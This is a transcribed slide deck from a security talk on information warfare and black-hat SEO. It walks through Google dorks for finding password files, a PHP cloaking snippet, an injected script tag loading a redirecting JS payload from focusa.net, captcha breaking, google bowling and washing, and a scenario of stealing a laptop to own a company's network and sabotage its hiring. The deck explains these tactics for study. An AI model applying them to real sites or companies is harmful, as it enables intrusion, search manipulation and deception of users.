Small treatise about e-manipulation for honest people

Transcription

Introduction
Information based attacks
Search engine optimization
Once upon a time. . .
Small treatise about e-manipulation for honest
people
F. Raynal & F. Gaspard
Information based attacks in the Internet
Frédéric Raynal
Sogeti / Cap Gemini – MISC magazine
fred(at)security-labs.org
frederic.raynal(at)sogeti.com
François Gaspard
New Zealand Telecom International
fg(at)tnzi.com
kad(at)miscmag.com
1/59
Introduction
Storybook
Attacking with no limit
Information warfare : often restricted to information as a contents
Hacking : often restricted to a technical exploit
What if we merge both ?
⇒ Attacking with both the content and the container
Information based operations : deception, intoxication,
misinformation,. . .
Technical operation : Search Engine Optimization as a mean to
emphasize the information we want
2/59
Introduction
Collect
Recruit
Arm
Propagate
Roadmap
1
2
3
3/59
Introduction
Collect
Recruit
Arm
Propagate
(Short and inaccurate) Summary of Information warfare
2 kinds of orientation
Information management in order to achieve information dominance
Use information to produce knowledge
Others have to run after you to keep up-to-date
Information used as a weapon
Dominance is one goal, not the only one
Think also of deception, intoxication or misinformation, . . .
4/59
Introduction
Collect
Recruit
Arm
Propagate
Information based attacks (IBA)
Collect
Human
Newspapers
Internet
Propagate
Newspapers
leaflets
Web sites
Consumers
Researchers
Journalists
Recruit
Articles
Interviews
Books
Arm
5/59
Introduction
Collect
Recruit
Arm
Propagate
Roadmap
1
Collect
Recruit
Arm
Propagate
2
3
6/59
Introduction
Collect
Recruit
Arm
Propagate
Collect
Where to gather information on the Internet
Google, MSN, yahoo,. . . , only see 10% of the web !
Ex. : social networks websites (Linkedin, orkut, twitter, facebook,. . . )
Use the appropriate tool depending on the information you are
looking for :
Ex. : Federal Funding Accountability and Transparence (FFATA) for
contracts with the US government
Perimeter of a network has become from known to blurred
Perimeter of information is out of control. . .
7/59
Introduction
Collect
Recruit
Arm
Propagate
Google Hacking
Fun and profits
Finding passwords
inurl :passwd.txt (1st result in google.com :
WebAdmin :aeYYajmW204V6)
Owned websites
intitle :"hacked by" : imaginative pictures. . .
intitle :tt2.swi : compromised websites installing a java trojan
Entertainment
intitle :"Live View / - AXIS" | inurl :view/view.shtml :
some surveillance cams
site :free.fr intitle :"index of" mp3 : p2p outdated
8/59
Introduction
Collect
Recruit
Arm
Propagate
Roadmap
1
Collect
Recruit
Arm
Propagate
2
3
9/59
Introduction
Collect
Recruit
Arm
Propagate
Recruit
Populate the attackers
Infiltrate where they already are
Stay hidden as much as possible : tor, open proxies, open WiFi, . . .
Create your own contesting
Opposition website : federate all opponents at one place
10/59
Introduction
Collect
Recruit
Arm
Propagate
Opposition website : jeboycotteDanone.com
11/59
Introduction
Collect
Recruit
Arm
Propagate
Roadmap
1
Collect
Recruit
Arm
Propagate
2
3
12/59
Introduction
Collect
Recruit
Arm
Propagate
Arm : battlefield == the Internet
There is life outside the Internet
Consequences, answers to our actions can be lead outside of the
Internet
Combining it with others battlefields is more efficient : law suits,
finance, information in newspapers or leaflets, . . .
Internet howto
Websites are spread all over the Internet
Add websites under your control
A human looks for an information
Spread information on the Internet, push it to the user
The results are found according to search engines
Change the results by tricking the search engines
13/59
Introduction
Collect
Recruit
Arm
Propagate
Usual attacks
Using information to attack
Intoxication : attempt to misguide the interpretations, the reasoning
of the target, that is its analysis capacities
Ex. : spreading a wrong information, ”false/false” strategy
Ex. : change the content of a website according to who comes
Deception : can be either based on hiding (e.g. camouflage,
blinding) or simulation (create, lure, invent)
Ex. : WW2, when false military bases were created in order to abuse
the German on the d-day location
Ex. : abuse search engines to warp the results
Misinformation : based on alteration, removal, addition and so on of
information
Ex. : the supposed lethal benzene in the bottles of Perrier
Ex. : hoaxes, rumors spreading from a forum to another one, then by
mail, and so on
14/59
Introduction
Collect
Recruit
Arm
Propagate
Roadmap
1
Collect
Recruit
Arm
Propagate
2
3
15/59
Introduction
Collect
Recruit
Arm
Propagate
Propagate
Organize knowledge to export the battle
Increase the doubts toward the target in the public
Increase the bad consciousness of the target itself
Questions and answers
What if you can increase the perception of all our vectors and in the same
time, decrease the perception of the target’s answers ?
⇒ Where SEO comes into play . . .
16/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Aggressive Black Hat SEO
Roadmap
1
2
3
17/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Definitions
Web Spam
The practice of manipulating web pages in order to cause search engines
to rank some web pages higher than they would without any manipulation.
Search engine optimization (SEO) [?]
SEO is the process of improving the volume and quality of traffic to a web
site from search engines via ”natural” (”organic” or ”algorithmic”) search
results for targeted keywords.
18/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Why/How would I do SEO ?
Motives
Users trust search engines as a means of finding information
⇒ Exploit this trust
Users usually do not look past the first ten results returned by the
search engine
⇒ Exploit this laziness
A matter of color
White hat SEO : a site conforms to the search engines’ guidelines
and involves no deception
Black hat SEO : attempts to improve rankings in ways that are
disapproved of by the search engines, or involve deception
19/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Roadmap
1
2
White Hat SEO
Black Hat SEO
Advanced examples
3
20/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
A quick overview of White Hat SEO
Usual guidelines
Keywords : be creative, avoid generic keywords
Architecture : page rank computed according to {in|out}coming links
Content : need to be innovative and refreshed regularly
⇒ Guidelines are not written as a series of rules
Strategy : long term, no deception
Create content for users, not for search engines
Make that content easily accessible to the spiders
⇒ Content indexed by SE is the same as the one seen by users
21/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Roadmap
1
2
White Hat SEO
Black Hat SEO
Advanced examples
3
22/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
A quick overview of Black Hat SEO
Spam web for profit : online pharmacy industry [?]
Many industries prefer not to spam directly (due to anti-spam laws
in US & Europe)
They create an affiliate program
⇒ Sales increase : regular incomes thanks to affiliate
⇒ Limited Liability : affiliate used as escape goat
How some affiliation programs allow to spam ?
No terms of agreement at the sign-up page
Some companies operate in jurisdiction where spam is not illegal
(ex. Seychelles)
Spam is ”restricted” to email spam
23/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Black Hat SEO is a myth. . . or not
[?]
24/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
A quick overview of Black Hat SEO
Strategy : short term, deception
Content indexed by SE is often different from the one seen by users
Most techniques are nasty, some are illegal
A few basic examples
Content spam : altering the view of a SE over a page
Invisible text, keyword stuffing, doorway page, scraper sites,. . .
Link spam : take advantage of link-based ranking algorithms
Link farms, hidden links, sybil attacks, spam blogs, page
hijacking, . . .
World-writable spam : add links to sites editable by users
Blog entries, forums, wikis, referrer spamming, . . .
25/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Roadmap
1
2
White Hat SEO
Black Hat SEO
Advanced examples
3
26/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Cloaking
Goal
Modify the content of the page according to the parameters
Cloaking for dummies
User agent cloaking : change page depending on who comes
i f ( s t r p o s ( $ SERVER [ " H T T P _U S E R _ A G EN T " ] , " Googlebot " ) ) {
i n c l u d e ( " googlebot - special . html " ) ;
} else {
// display real page
}
IP cloaking : change page depending on where a request comes from
$ip
= s t r v a l ( $ SERVER [ " REMOTE_ADDR " ] )
28/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
A(n in)famous example : spider view of bmw.de
29/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
A(n in)famous example : human view of bmw.de
30/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Solving captcha
Goal
Automatic registration to forums, post comments on blogs, . . .
Captcha for dummies [?]
Remove the background : denoising
Join points in the letters : filtering
Derotate the letters : geometric transformation
Read the letters : pattern recognition
31/59
Introduction
Solving captcha : phpbb2
White Hat SEO
Black Hat SEO
Advanced examples
[?]
32/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Real case : who wants certified viagra (1/3)
33/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Real case : certified viagra at university (2/3)
http ://spirit.dos.uci.edu/interfaith/ ?page=254
User clicks on 2nd answer, trusting the .edu
PR : 6/10 – Backlinks : 3420
Site runs Nucleus CMS v3.23 (current : 3.32)
Flaw in default skin allows to inject code in generated pages :
< s c r i p t s r c=" http :// focusa . net / gcoxiio . js "></s c r i p t >
gcoxiio.js redirects depending on the referer :
Referer : www.google.fr/search ?q=certified+viagra&ie=utf-8
Redirection :
i f ( document . r e f e r r e r . toLowerCase ( ) . i n d e x O f ( ’ viagra ’)!= −1)
l o c a t i o n . h r e f=’ http :// pillsonline . biz / viagra . htm ’ ;
User is redirected to http ://pillsonline.biz/viagra.htm
35/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Real case : pills online (3/3)
36/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Roadmap
1
2
White Hat SEO
Black Hat SEO
Advanced examples
3
37/59
Introduction
White Hat SEO
Black Hat SEO
Advanced examples
Black Hat SEO reversed
Goal
Decrease page rank of competitors’ websites
Some nasty but legal ideas. . .
Inject poison keywords to the target’s website : sex, drug, medicine,
viagra, casino. . .
Google browling : add links to the target from many bad sites
Even better with blacklisted websites !
Google Washing : use an old domain you own to duplicate the
content of the target’s website, then report the target as duplicate
content ⇒ SE will ban the newest
And many more ! ! !
38/59
Introduction
The main strategy
White ops based on SEO
Black ops based on hacking
Roadmap
1
2
3
39/59
Introduction
The main strategy
Situation
Players
Proctor : a french IT consulting company
Limited resources, driven by cost killing
Tonton : an indian IT consulting company
Many men at work cheaper than european ones
Comments
Goal : Tonton wants to enter the European market
Vector : buy a well known local company, Proctor
Mean : exhaust Protor’s resource so that it need helps
Limit : do not deteriorate too much Proctor’s image
40/59
Introduction
The main strategy
Roadmap
1
2
3
The main strategy
41/59
Introduction
The main strategy
Buying Proctor : the main strategy
Marry me
Tonton propose a partnership to Proctor :
A big big (and lucrative) contract in India, where Proctor wants to
grow
Proctor must propose to Tonton other contracts in Europe where
Proctor wants to find partners
The 1st indian contract is really interresting for Proctor
Tonton gives next other (rotten) contracts to Proctor on the India
markets
Results
Proctor : resources consumed in several markets, new businesses,
lawsuits
Tonton : internal view of Proctor, cheaper resources involved
42/59
Introduction
The main strategy
Buying Proctor : the main strategy
I
n
d
i
a
Tonton &
Proctor
negociate
T&P
answer (and
win) a 1st
big contract
Contract
for P
Contract
for P
Lot of work
Small benefits
Contract
for T
Lawsuits
a
T : Tonton (indian cie)
P: Proctor (european cie)
PR: Public Relation
43/59
Introduction
The main strategy
Buying Proctor : drug the salesmen of Proctor
Happiness or deception for the groom
Provide a nice clients list to several salesmen ⇒ consume energy
trying to reach them
Invitation to tender : identify them and gives them to Proctor ⇒
consume energy trying to win them
Hire away salesmen : show them life is better somewhere else ⇒
cause internal tensions and resignation
Results
Proctor : salesmen will be busy as they have never been, goal being
to saturate them
Tonton : learn the european market with the watcher, wait for
exhaustion
44/59
Introduction
The main strategy
Buying Proctor : drug the salesmen
I
n
d
i
a
P
a
r
i
s
T + PR
Contract
for P
T&P
answer (and
win) a 1st
big contract
Tonton &
Proctor
negociate
Exhibitions
T puts
watchers on
.fr's markets
Contract
for P
Visitors
lists
Lot of work
Small benefits
Contract
for T
Lawsuits
Clients list
given to
salesmen
Hire away
salesmen
a
Many
invitations
to tender
PR: Public Relation
45/59
Introduction
The main strategy
Roadmap
1
2
3
The main strategy
46/59
Introduction
The main strategy
Buying Proctor : life-in-IT-consulting.org
Time for opposition
Currently no website on life and business in IT consulting ⇒ create
one, promote it
Use contacts found during information gathering to provide inputs
Contact a PR agency to promote the articles (propose interesting
and new content ! ! !)
Use white hat SEO to enforce the visibility
Never target directly Proctor
⇒ We have created a very efficient long-term influence tool
47/59
Introduction
The main strategy
Buying Proctor : life-in-IT-consulting.org
I
n
d
i
a
P
a
r
i
s
T + PR
Contract
for P
T&P
answer (and
win) a 1st
big contract
Tonton &
Proctor
negociate
Exhibitions
T puts
watchers on
.fr's markets
Contract
for P
Lot of work
Small benefits
Contract
for T
Lawsuits
Clients list
given to
salesmen
Visitors
lists
Hire away
salesmen
a
Many
invitations
to tender
inform
S
E
O
www.Life-in-itconsulting.org
Workers
Former workers
Clients
PR =>
press
"bad"
content
salary study
PR: Public Relation
48/59
Introduction
The main strategy
Buying Proctor : aggressive SEO to shut up Proctor
The sound of silence
Google bowling : create many backlinks to Proctor from ”bad”
websites (racist, sex, drugs, online casino, . . . )
Create ”bad” websites with the same keywords as Proctor
Use blacklisted websites to link with Proctor
Duplicate content : find or create duplicate content on Proctor’s
website
Use blogs, forum, . . . , to have many links pointing to the same page
http://proctor.com/blogs?lang=fr
http://proctor.com/blogs?lang=en
Link farm : automatically create many websites dealing with Proctor
having many many many links to Proctor
50/59
Introduction
The main strategy
Buying Proctor : aggressive SEO to shut up Proctor
I
n
d
i
a
P
a
r
i
s
T + PR
Contract
for P
T&P
answer (and
win) a 1st
big contract
Tonton &
Proctor
negociate
Exhibitions
T puts
watchers on
.fr's markets
Contract
for P
Lot of work
Small benefits
Contract
for T
Lawsuits
Clients list
given to
salesmen
Visitors
lists
Hire away
salesmen
a
Many
invitations
to tender
inform
S
E
O
Workers
Former workers
Clients
PR =>
press
"bad"
content
salary study
Link farms
S
E
O
proctor.com
Google
washing
Google
bowling
Flaw
exploitation
PR: Public Relation
51/59
Introduction
The main strategy
Roadmap
1
2
3
The main strategy
52/59
Introduction
The main strategy
Buying Proctor : owning the local network
One laptop stolen is the key to everything. . .
Printing
Server
jdupont : ********
Administrator :
(vide)
jdupont
empty pwd
sqlserver / sa
DB Server
admprov : *******
admsql : ******
srvadm : srv0dm
admprov
2 domain controlers
1289 accounts
8 admin
Administrator (********)
jrichard (********)
jdupont (********)
jkevin (********)
dvador (********)
samva (********)
cveso (********!)
obade (********)
File and
printing servers
Standard station
locadm : ********
locuser : qwerty
locadm
rv
weak password
known password
Backup Server
+ master
sv_deploy :
d3pl0y75
Administrator :
$admin$
Project
rv : rv
Administrator :
*******
Administrator
Several servers
(Lotus Notes,
mails, ...)
53/59
Introduction
The main strategy
Buying Proctor : owning the local network
I
n
d
i
a
P
a
r
i
s
T + PR
Contract
for P
T&P
answer (and
win) a 1st
big contract
Tonton &
Proctor
negociate
Exhibitions
T puts
watchers on
.fr's markets
Contract
for P
Lot of work
Small benefits
Contract
for T
Lawsuits
Clients list
given to
salesmen
Visitors
lists
Hire away
salesmen
a
Many
invitations
to tender
inform
S
E
O
Workers
Former workers
Clients
PR =>
press
"bad"
content
salary study
Link farms
S
E
O
proctor.com
Google
bowling
L
A
N
Steal
laptop
Own
AD
Own
www
Google
washing
Flaw
exploitation
Poison keywords
Cloaking
noise
Own
SMTP
PR: Public Relation
54/59
Introduction
The main strategy
Buying Proctor : when human (resources) is the weak link
Hiring away people
Focus on identified key people and send them (better) job proposal
Use the access to the LAN to get the resumes of all engineers,
spread them on the Internet : some competitors will know what to
do with them
Hiring process : hunting ghosts
People tracking resumes on the Internet are searching in the same
few sites : make the access to these sites difficult
Either on the proxy or the (shared) storage place, change what looks
like email address or phone number in resumes : people will be much
more difficult to reach
55/59
Introduction
The main strategy
Buying Proctor : when human (resources) is the weak link
I
n
d
i
a
P
a
r
i
s
T + PR
Contract
for P
T&P
answer (and
win) a 1st
big contract
Tonton &
Proctor
negociate
Exhibitions
T puts
watchers on
.fr's markets
Contract
for P
Lot of work
Small benefits
Contract
for T
Lawsuits
Clients list
given to
salesmen
Visitors
lists
Hire away
salesmen
a
Many
invitations
to tender
inform
S
E
O
Workers
Former workers
Clients
PR =>
press
"bad"
content
Articles
salary study
inform
Link farms
S
E
O
proctor.com
Google
bowling
L
A
N
Steal
laptop
Own
www
Own
AD
H
R
PR: Public Relation
Flaw
exploitation
Poison keywords
Cloaking
noise
Own
SMTP
steal
Key
people
Recruitment
process
Google
washing
leak
CVs send to
Recruitment offices
Hire away
Fake resumes
Warp resumes
Sites maintenance
56/59
Introduction
The main strategy
Conclusion
Mixing everything in a clever way
Attacking with information is complex but difficult to oppose
Attacker has the initiative, a real advantage
Quite easy (with time but no mean) to amplify the attack
SEO is a mix of following guidelines, cleverness and hacking
Usually applied on our own website (thus information)
Can also be applied by everyone on anybody’s website
⇒ Mixing both is really efficient
The Internet is realy well suited to propagate information (e.g.
deception, misinformation, intoxication)
Content (information) is emphasize thanks to container (SEO)
Do not forget you can also combine with other tricks from other
fields
57/59
Introduction
The main strategy
Q & (hopefully) A
58/59
Introduction
The main strategy
References I
http ://en.wikipedia.org/wiki/Search engine optimization
Captcha Breaking W/ PHPBB2 Example
http ://www.bluehatseo.com/user-contributed-captcha-breaking-w-phpbb2-examp
Page Hijack : The 302 Exploit, Redirects and Google
http ://clsc.net/research/google-302-page-hijack.htm
Web spam techniques
R. S. Liverani –
http ://malerisch.net/docs/web spam techniques/web spam techniques.html
59/59

Small treatise about e-manipulation for honest people

Transcription

Similar documents

starter service

case study shleppers

Poker Kortspel Poang - Wilde Country Rancho

Sportingbet - Forestview

social service

Comblue presentation

Writing for the Web, Yahoo! Style By Trystan L. Bass

Asia

Introduction to Internet Marketing: Introduction to Internet Marketing:

elogex